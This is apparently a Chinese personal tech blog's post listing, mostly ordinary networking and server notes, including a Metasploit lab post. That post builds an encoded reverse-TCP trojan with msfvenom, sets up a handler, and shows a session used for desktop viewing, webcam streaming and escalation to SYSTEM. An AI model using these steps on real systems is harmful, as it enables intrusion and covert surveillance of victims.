首页
统计信息
友情链接
壁纸
Search
1
【更新】CommentToMail typecho2017&v4.1& Mailer三版本,支持php5.6/7,插件详解
158,144 阅读
2
【90APT开源免费】第三代哈弗H6、哈弗大狗、H6经典版车机开启无线ADB、升级地图、安装软件全流程
16,350 阅读
3
CentOS 7安装bbr教程
12,887 阅读
4
纯小白10分钟变身linux建站高手?宝塔linux面板全体验
12,484 阅读
5
深信服超融合架构测试介绍
11,879 阅读
技术相关
ACG相关
胡言乱语
数码杂烩
登录
Search
标签搜索
进击的巨人
漫画
宝塔
php
typecho
diy
vps
折腾
动漫
优酷路由宝
ubuntu
路由器
QQ
KMS
王忘杰
累计撰写
280
篇文章
累计收到
179
条评论
首页
栏目
技术相关
ACG相关
胡言乱语
数码杂烩
页面
统计信息
友情链接
壁纸
搜索到
248
篇与
的结果
2021-03-17
思科模拟器笔记
本文记录的是使用思科模拟器搭建:思科常用命令ACL访问控制列表vlan隔离+PAT段口多路复用Rip距离矢量内部网关协议单臂路由+NAT复用PAT三层交换SVI+路由器PAT思科常用命令#show version 显示版本号 #running-configuration 显示当前配置 #show interfaces ethernet 0/1 显示接口信息 #show ip 显示交换机IP地址 config#hostname sw1 设置主机名 config#ip address 1.1.1.1 255.255.255.0 配置IP地址 config#ip default-gateway 1.1.1.1 配置缺省网关 config#interface e0/1 config#duplex full 配置全双工模式 #setup 初始化配置 #show startup 显示启动配置 config#line console 0 config-line#login config-line#password cisco 终端密码 config#line vty 0 4 启动5个虚拟终端 config-line#login config-line#password sanjose config#enable password cisco 开启密码 config#enable secret sanfran 特权模式密码 config#interface type number 端口标识 config#interface type slot/port 针对模块交换机 配置串行端口 #configure term config#interface serial 0 config-if#clock rate 64000 设置时钟速率 config-if#bandwidth 64 设置带宽 config-if#shutdown 关闭接口 config-if#no shutdown 开启接口 保存配置 #copy runnig-config startup-config #write #reload 重启 #telnet 1.1.1.1 使用telnet连接到远程设备 #<ctrl-shift-6>x 挂起 #resume 1 恢复 #sh session 查看telnet连接 #sh user 查看登陆的用户 #disconnnect 关闭远程回话 #clear line 11关闭被远程打开的回话 #ip name-server 1.1.1.1 绑定hosts #ping 1.1.1.1 #trace 1.1.1.1 CDP 思科发现协议 PVST+ 思科生成树协议 VTP 思科Vlan同步协议 S1 config#vtp mode server 服务器 S1 config#vtp domain sw 域名 S1 config#vtp password cisco 密码 S2 config#vtp mode client 客户端 S3 config#vtp mode transparent 透明模式 S1 config#interface f0/1 S1 config-if#switchport mode trunk S1 config-if#switchport trunk native vlan 99 S1 config-if#no shutdown config#ip route 1.1.1.1 0.0.0.255 静态路由 config#ip route 0.0.0.0 0.0.0.0 1.1.1.1 默认路由 解决路由环路 定义最大值 水平分割 路由毒化 毒性逆转 抑制计时器 触发更新 RIP协议 config#router rip config-route#network 1.1.1.0 config-route#network 1.1.2.0 直连路由 #show ip protocols 核实rip配置 #sh ip route #debug ip rip IGRP #route igrp 100 #network 1.1.1.0 #network 1.1.2.0 直连路由 EIGRP #router eigrp 100 #network 1.1.1.0 #network 1.1.2.0 直连路由 OSFP config#router ospf 1 config-router#net 1.1.1.0 0.0.0.255 area 0 config-router#net 1.1.2.0 0.0.0.255 area 0 宣告路由 config#router ospf 2 config-router#net 0.0.0.0 255.255.255.255 area 0 宣告所有路由 ACL 标准访问列表 范围从1-99 access-list 1 premit 172.16.0.0 0.0.255.255 允许一个网段 接口方向 f0/0 interface ethernet 0 ip access-group 1 out 允许规则 interface ethernet 1 ip access-group 1 out 允许规则 access-list 1 deny 172.16.4.13 0.0.0.0 拒绝一个主机 access-list 1 permit 0.0.0.0 255.255.255.255 允许其他 接口方向 e0 172.16.3.0 方向out interface ethernet 0 ip access-group 1 out access-list 1 deny 172.16.4.0 0.0.0.255 拒绝一个子网 access-list 1 permit any 允许其他 接口方向 e0 172.16.3.0 方向out interface ethernet 0 ip access-group 1 out 扩展ACL 扩展访问列表 从100-199 access-list 101 deny ecp 172.16.4.0 0.0.0.255 172.16.3.0 0.0.0.255 eq 21 禁止172.16.4.0到172.16.3.0从E0出去的ftp服务 access-list 101 permit ip any any interface ethernet 0 ip access-group 101 out access-list 101 deny tcp 172.16.4.0 0.0.0.255 any eq 23 禁止网络172.16.4.0从e0出去的telnet access-list 101 permit ip any any interface ethernet 0 ip access-group 101 out ACL访问控制列表vlan隔离+PAT段口多路复用SW config#int f0/10 config-if#switchport mode access config-if#switchport access vlan 10 (设置vlan10) config#int f0/11 config-if#switchport mode access config-if#switchport access vlan 20 (设置vlan20) config#ip routing (启用路由模式) config#int vlan 10 config-if#ip address 10.0.1.1 255.255.255.0 config-if#no shutdown (启用vlan10 SVI) config#int vlan 20 config-if#ip address 10.0.2.1 255.255.255.0 config-if#no shutdown (启用vlan20 SVI) PC IP 掩码 网关 SW(ACL vlan20隔离 其余通讯) Switch(config)#access-list 100 deny ip 10.0.2.0 0.0.0.255 10.0.1.0 0.0.0.255 (屏蔽从1.0到2.0网段的通讯 在1.0网段上是in方向) Switch(config)#access-list 100 deny ip 10.0.2.0 0.0.0.255 10.0.3.0 0.0.0.255 Switch(config)#access-list 100 permit ip any any (允许其他) Switch(config)#int vlan 20 (2.0网段是vlan20) Switch(config-if)#ip access-group 100 in (加载规则) RT config#int f0/0 config-if#ip address 1.1.1.1 255.255.255.0 config-if#no shutdown (外网设置) config#int f0/1 config-if#ip address 10.0.0.1 255.255.255.0 config-if#no shutdown (内网设置) SW config#int f0/1 config-if#no switchport config-if#ip address 10.0.0.2 255.255.255.0 (三层交换启用接口) config#ip route 0.0.0.0 0.0.0.0 10.0.0.1 (三层交换配置静态路由) RT config#ip route 10.0.0.0 255.255.0.0 10.0.0.2 (路由器配置静态路由) config#access-list 1 permit 10.0.0.0 0.0.255.255 config#ip nat in so list 1 int f0/0 overload config#int f0/0 config-if#ip nat outside config#int f0/1 config-if#ip nat inside (路由器配置NAT) Rip距离矢量内部网关协议rip V1 int f0/0 ip add 1.1.1.1 255.255.255.0 no sh int f0/1 ip add 1.1.2.1 255.255.255.0 no sh exit router rip network 1.1.1.0 network 1.1.2.0 rip V2 int f0/0ip add 1.1.1.1 255.255.255.0no shint f0/1ip add 1.1.2.1 255.255.255.0no shexitrouter ripversion 2no auto-summarynetwork 1.1.1.0network 1.1.2.0单臂路由+NAT复用PAT交换机 Switch>en Switch#conf t Switch(config)#interface f0/10 Switch(config-if)#switchport mode access Switch(config-if)#switchport access vlan 10 Switch(config-if)#no shutdown Switch#conf t Switch(config)#interface f0/11 Switch(config-if)#switchport mode access Switch(config-if)#switchport access vlan 20 Switch(config-if)#no shutdown Switch(config)#interface f0/1 Switch(config-if)#switchport mode trunk Switch(config-if)#no shutdown 路由器 Router(config)#interface f0/0 Router(config-if)#no shutdown Router(config)#interface f0/0.10 Router(config-subif)#encapsulation dot1Q 10 Router(config)#interface f0/0.20 Router(config-subif)#encapsulation dot1Q 20 Router(config-subif)#ip address 172.16.20.1 255.255.255.0 Router#wr 客户端 ping NAT复用pat router(config)#int f0/0 router(config-if)#ip add 1.1.1.1 255.0.0.0 (设置外部端口ip) router(config-if)#int f0/0.10 (vlan) router(config-if)#ip add 192.168.10.1 255.255.255.0 (设置内部端口ip) router(config)#access-list 1 permit 192.168.1.0 0.0.0.255 (定义acl或any全局) router(config)#ip nat in so list 1 int f0/0 overload (配置复用路由器外部端口地址转换) router(config)#int f0/0 router(config-if)#ip nat outside router(config-if)#int f0/1 router(config-if)#ip nat inside (在内部和外部端口启用nat) router(config)#ip route 0.0.0.0 0.0.0.0 gateway-ip (配置默认路由,保证数据包正常选路路由,这里gateway通过isp下发配置) 三层交换SVI+路由器PATSW config#int f0/10 config-if#switchport mode access config-if#switchport access vlan 10 (设置vlan10) config#int f0/11 config-if#switchport mode access config-if#switchport access vlan 20 (设置vlan20) config#ip routing (启用路由模式) config#int vlan 10 config-if#ip address 10.0.1.1 255.255.255.0 config-if#no shutdown (启用vlan10 SVI) config#int vlan 20 config-if#ip address 10.0.2.1 255.255.255.0 config-if#no shutdown (启用vlan20 SVI) PC IP 掩码 网关 RT config#int f0/0 config-if#ip address 1.1.1.1 255.255.255.0 config-if#no shutdown (外网设置) config#int f0/1 config-if#ip address 10.0.0.1 255.255.255.0 config-if#no shutdown (内网设置) SW config#int f0/1 config-if#no switchport config-if#ip address 10.0.0.2 255.255.255.0 (三层交换启用接口) config#ip route 0.0.0.0 0.0.0.0 10.0.0.1 (三层交换配置静态路由) RT config#ip route 10.0.0.0 255.255.0.0 10.0.0.2 (路由器配置静态路由) config#access-list 1 permit 10.0.0.0 0.0.255.255 config#ip nat in so list 1 int f0/0 overload config#int f0/0 config-if#ip nat outside config#int f0/1 config-if#ip nat inside (路由器配置NAT)
2021年03月17日
620 阅读
0 评论
0 点赞
2021-03-17
Meterpreter(MSF)payload攻击载荷,反弹实验。
制作木马攻击载荷的概念类似反弹shell,使用msfvenom -v可以查看操作帮助msfvenom -l可以查看当前可以使用的攻击载荷列表生成一个反弹木马msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.136.131 lport=666 -f exe -e x86/shikata_ga_nai -i 8 -o muma2.exe -p windows/meterpreter/reverse_tcp使用反弹模式 lhost=192.168.136.131我的IP lport=666我要监听的端口 -f exe生成exe文件 -e x86/shikata_ga_nai编码混淆方式 -i 8编码混淆次数 -o muma.exe生成的文件 当然,简单的编码混淆是过不了杀毒软件的。本地监听进入监听模式msf > use exploit/multi/handler 监听的payload类型msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp 监听的IPmsf exploit(multi/handler) > set lhost 192.168.136.131 lhost => 192.168.136.131 监听的端口msf exploit(multi/handler) > set lport 666 lport => 444 开始监听msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.136.131:444 [*] Sending stage (179779 bytes) to 192.168.136.133 主机上线[*] Meterpreter session 1 opened (192.168.136.131:444 -> 192.168.136.133:1027) at 2018-05-05 20:10:43 +0800 VNC桌面实时监控meterpreter > run vnc Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions No authentication needed Authentication successful Desktop name "www-a8d99aa2ea1" 查看在线的摄像头meterpreter > webcam_list 1: 实时监控摄像头meterpreter > webcam_stream [*] Starting... [*] Preparing player... [*] Opening player at: ebSRJuzI.html 查看系统信息meterpreter > sysinfo Computer : WWW-A8D99AA2EA1 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows 查看当前权限meterpreter > getuid Server username: WWW-A8D99AA2EA1\Administrator 权限提升meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 完毕以上就是Meterpreter(MSF)payload攻击载荷的简单反弹实验,msf作为大型攻击框架,实际上可以攻击安卓、web系统、linux等等,帮助文档也比较详细,英文基础好上手毫无压力。
2021年03月17日
2,891 阅读
1 评论
0 点赞
2021-03-17
深信服超融合架构测试介绍
简介深信服超融合本质是基于KVM的虚拟机控制器,主要由服务器虚拟化、网络虚拟化、存储虚拟化、网络功能虚拟化四部分组成,结构清晰,使用简单,包含HA(高可用,自动重启异常虚拟机),在线热迁移(vMotion)特性,但并无FT(容错保护,0宕机)等高级特性。环境介绍深信服超融合采用类EXSI架构,需要在服务器安装独立操作系统,本次测试使用的IP为192.168.12.64 192.168.12.66,控制台虚拟IP为192.168.12.62,控制台实际运行在主控机上,当主控机关闭时,其他主机会接替主控机职务。整体界面,由于深信服超融合本质为KVM控制器,所以在控制界面依然体现物理服务器资源占用率。功能介绍在创建虚拟机的方式上,与桌面级应用vmpro并无区别,依旧分为新建、克隆、导入,同时增加了Oracle,SQL Server数据库的快速创建方式,但用处基本不大,比直接在系统中安装数据库没有什么特别的优势。在虚拟机导入中,支持OVA(Open Virtualization Appliance:开放虚拟化设备)标准虚拟机和vma深信服私有虚拟机。新建虚拟机页面简单易懂数据保护方面,深信服提供了两种备份方案,同时硬件本身也通过raid方式保护。定时备份CDP实时数据备份,但深信服依然有备份时间间隔,备份文件支持备份到共享存储(共享文件夹)。从显示的内容看起来为增量备份方案物理机迁移功能与VMware vCenter Converter:P2V 虚拟机转换器使用方法相同。添加超融合物理机也很简单,仅需要安装类似esxi的超融合系统即可。存储器支持iscsi(互联网小型计算机系统接口)、FC(光纤通道)、本地三种方式,虚拟机管理上与本地运行虚拟机并无太大区别,在关闭HA时,虚拟机仅运行在各自的物理服务器上。深信服超融合的一个优势是支持添加超融合设备,比如行为管理、入侵检测等,但需要额外付费,同时这些设备也会占用相应的资源。网络拓扑上实现了鼠标拖动连接,更直观简单。虚拟网络板块可以对添加的超融合设备进行设置在硬raid的情况下服务器中的系统并不能接收到raid状态。从这里能看出来,超融合采用的是软raid,超融合系统安装在ssd中占用了一块空间,同时另外两块硬盘组成raid并且加入剩余ssd空间当作缓存,同时两台机器组成分布式存储,确保存储数据的一致。实体机设置实体机存储块设置更多功能,通常都是充数的。虚拟机详情虚拟机控制台以上就是深信服超融合架构的简单介绍,接下来我们分析一下深信服超融合的优缺点。优点全中文web界面,使用简单,向导功能清晰,简单配置即可使用。支持HA高可用。网络拓扑鼠标操作,支持添加深信服设备。缺点无FT高级特性,不能实现0宕机。包装过度,蜜汁特效,莫名其妙的卡顿。系统安装在ssd中,同时ssd又是缓存盘,由于ssd是pe(耗损资源抚平次数)次数计算寿命,而超融合本身又是软raid,超融合系统崩溃时,无法恢复数据,只能使用其他超融合物理机上的分布式备份。分布式存储高度依赖网络同步数据,当写入速度超过网络速度会出现不可预知的问题。网络功能添加,例如深信服行为管理,既要付费购买,又要占用超融合资源,同时又只能应用在超融合架构里,鸡肋。在服务器硬件较为可靠的今天,通常服务器损坏都是硬盘故障,在raid10保护的单机可用性上,甚至不如VMware提供的免费版vSphere Hypervisor。
2021年03月17日
11,879 阅读
0 评论
4 点赞
2021-03-17
瑞友天翼应用虚拟化,企业远程办公,盗版软件规避的得力助手。
简介瑞友天翼应用虚拟化系统(GWT System)是国内具有自主知识产权的应用虚拟化平台,是基于服务器计算(Server-based Computing)的应用虚拟化平台。它将用户所有应用软件(ERP、OA、CRM、PDM、CAD……)集中部署在天翼服务器(群)上,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。操作终端无需再安装应用程序,通过天翼独特的RAP 协议(Remote Application Protocol),即可让用户快速访问服务器上的各类应用软件;天翼RAP 协议只传输鼠标、键盘及屏幕变化的矢量数据,访问仅需3KB/s(20kbps)的带宽,用户不再受客户端和连接性能要求的限制,在任何时间、任何地点,利用任何设备、任何网络连接方式,即可高效安全地访问服务器(群)上的应用程序和关键资源。企业痛点远程办公使用繁琐,比如仅使用金蝶,却需要VPN之类的远程连接手段。本地电脑配置不高,需要画图,又不想升级配置。购买了几套正版软件,但需要使用的人很多。都可以用应用虚拟化解决。下面我以浩辰CAD为例。下载http://soft.realor.cn/Gwt6.0.exe安装默认勾选即可默认即可设置密码设置web端口安装完成务必重启部署CAD,不再赘述。瑞友天翼主界面添加用户发布应用画图程序务必使用32位色彩,金蝶之类可以用16位速度更快。根据情况选择映射方式,推荐映射桌面和我的文档,局域网可以考虑不使用加密,速度更快。完成客户端使用登陆IP,首次使用需要安装客户端。不需要桌面图标和开机自启动再次登陆,注意允许瑞友天翼插件运行。运行CAD对于CAD来说,它相当于装在本地电脑上,路径映射正常。完毕
2021年03月17日
3,525 阅读
0 评论
0 点赞
2021-03-17
服务器运维之,centos忘记root密码怎么办,重置root密码,单用户模式
在grub选项菜单按e进入编辑模式编辑第二行,kernel那行 最后加上 1回车,按B引导进入进入后执行下列命令root@#passwd root (配置root的密码) Enter new unix password:输入新的密码 重启root@#init 6 完成
2021年03月17日
467 阅读
0 评论
0 点赞
2021-03-17
apache加固策略,隐藏http头返回信息,隐藏错误信息,启用https,申请沃通免费SSL,关闭TRACE Method
当前apche版本Apache/2.2.15 系统centos6
2021年03月17日
233 阅读
0 评论
0 点赞
2021-03-17
服务器安全之,隐藏端口,更改mysql端口,更改ssh端口
是不是应该挂个蜜罐,思前想后,我是拒绝的,因为黑客就算是在爆破,也会相应的耗费服务器资源,就让黑客忽略这台服务器吧!更改端口,我个人的原则,改到1W以上,例如22端口 10022 3306端口 13306 1W的端口用的很少,而且很少有黑客会扫描到1W以上的端口号查看当前mysql端口netstat -ntl 其实就能看出来开放了几个端口,mysql是3306如果以前改过,进入mysql查询 mysql -u root -p show global variables like 'port'; +---------------+-------+ | Variable_name | Value | +---------------+-------+ | port | 3306 | +---------------+-------+ 1 row in set (0.00 sec) 编辑/etc/my.cnf文件,添加一句port=3506 重启服务/etc/init.d/mysqld restart 查看netstat -ntl tcp 0 0 0.0.0.0:3506 0.0.0.0:* LISTEN 更改SSH端口/etc/ssh/sshd_config 添加一行Port 10022 重启服务/etc/init.d/sshd restart 然后netstat -nlt查看OK
2021年03月17日
418 阅读
0 评论
0 点赞
2021-03-17
centos6 私有云owncloud8搭建,建立虚拟机主机,启用https,用户管理
什么叫私有云?我们都知道百度网盘,我们可以上传下载编辑分享。而私有云,就是私人的网盘私有云可以做什么?企业内,可以通过私有云同步数据,防止因为客户机宕机而造成数据丢失个人用户,私有云可以有效的在多平台同步隐私数据,例如家庭照片,录像等等
2021年03月17日
374 阅读
0 评论
0 点赞
2021-03-17
centos6 LVM分区容量扩充
[root@cloud ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg_cloud-lv_root 7.4G 3.0G 4.1G 43% / 如果你买的VPS分区是10G+xxG=xxG这种,你肯定会遇到一个问题,根目录太小,空白磁盘不知道怎么利用
2021年03月17日
465 阅读
0 评论
0 点赞
2021-03-17
win2003+iis6+php+https跳转
买了个表,不仅vultr的单核768M比我快,这下连iis6都能装逼了。。目标配置iis6 配置php 添加https跳转
2021年03月17日
366 阅读
0 评论
0 点赞
2021-03-17
【笔记】mysql简单操作,建删表,建删用户,备份还原表
建议使用phpmyadmin或者Adminer操作,除非万不得已登陆mysql -u root -p 显示所有表show databases; 创建一个表CREATE DATABASE wordpress_db; 删除一个表drop database test; 列出所有用户SELECT DISTINCT CONCAT('User: ''',user,'''@''',host,''';') AS query FROM mysql.user; 删除一个用户delete from mysql.user where user='test' and host='localhost'; 创建一个用户,并给于用户一个表的所有权限GRANT ALL PRIVILEGES ON wordpress_db.* TO "user"@"localhost" IDENTIFIED BY "123456"; 保存FLUSH PRIVILEGES; 退出exit 备份与还原导出一个表mysqldump -uYONGHU -pMIMA -h127.0.0.1 -P3306 --routines --default-character-set=utf8 --databases BIAO > bak.sql 导入的操作其实一样的命令,注意最后的符号(> <)mysqldump -u用户名 -p密码 -h主机 数据库 < 路径mysqldump -uroot -p1234 BIAOdb < bak.sql
2021年03月17日
323 阅读
0 评论
0 点赞
2021-03-17
iptables的一些配置,附我的配置文件
控制单个I地址P的最大并发连接数iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 30 -j REJECT 限制连往本机的web服务,1个C段的IP的并发连接不超过100个,超过的被拒绝:iptables -I INPUT -p tcp --dport 80 -m iplimit --iplimit-above 100 --iplimit-mask 24 -j REJECT 限制连往本机的telnet单个IP并发连接为2个,超过的连接被拒绝:iptables -I INPUT -p tcp --dport 23 -m iplimit --iplimit-above 2 -j REJECT 防止同步包洪水(Sync Flood)iptables -A FORWARD -p tcp --syn -m limit --limit 1/s -j ACCEPT 防止各种端口扫描iptables -A FORWARD -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT Ping洪水攻击(Ping of Death)iptables -A FORWARD -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEP 屏蔽指定ipBLOCK_THIS_IP="x.x.x.x" iptables -A INPUT -i eth0 -p tcp -s "$BLOCK_THIS_IP" -j DROP 25个常用的iptables用法http://www.cnblogs.com/wangkangluo1/archive/2012/04/19/2457077.html我的配置文件覆盖,重启iptables即可/etc/sysconfig/iptables# Generated by iptables-save v1.4.7 on Thu Aug 20 10:40:51 2015 *filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [62:6399] -A INPUT -p tcp -m tcp --dport 80 -m connlimit --connlimit-above 20 --connlimit-mask 32 -j REJECT --reject-with icmp-port-unreachable -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT -A INPUT -p tcp -m tcp --dport 443 -j ACCEPT -A INPUT -p udp -m udp --dport 67 -j ACCEPT -A INPUT -p udp -m udp --dport 68 -j ACCEPT -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A INPUT -p icmp -j ACCEPT -A INPUT -i lo -j ACCEPT -A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT -A INPUT -j REJECT --reject-with icmp-host-prohibited -A INPUT -p udp -m udp --sport 53 -j ACCEPT -A INPUT -p udp -m udp --dport 53 -j ACCEPT -A FORWARD -j REJECT --reject-with icmp-host-prohibited -A FORWARD -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -m limit --limit 1/sec -j ACCEPT -A FORWARD -p icmp -m icmp --icmp-type 8 -m limit --limit 1/sec -j ACCEPT -A FORWARD -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK RST -m limit --limit 1/sec -j ACCEPT COMMIT # Completed on Thu Aug 20 10:40:51 2015
2021年03月17日
359 阅读
0 评论
0 点赞
1
...
15
16
17
...
21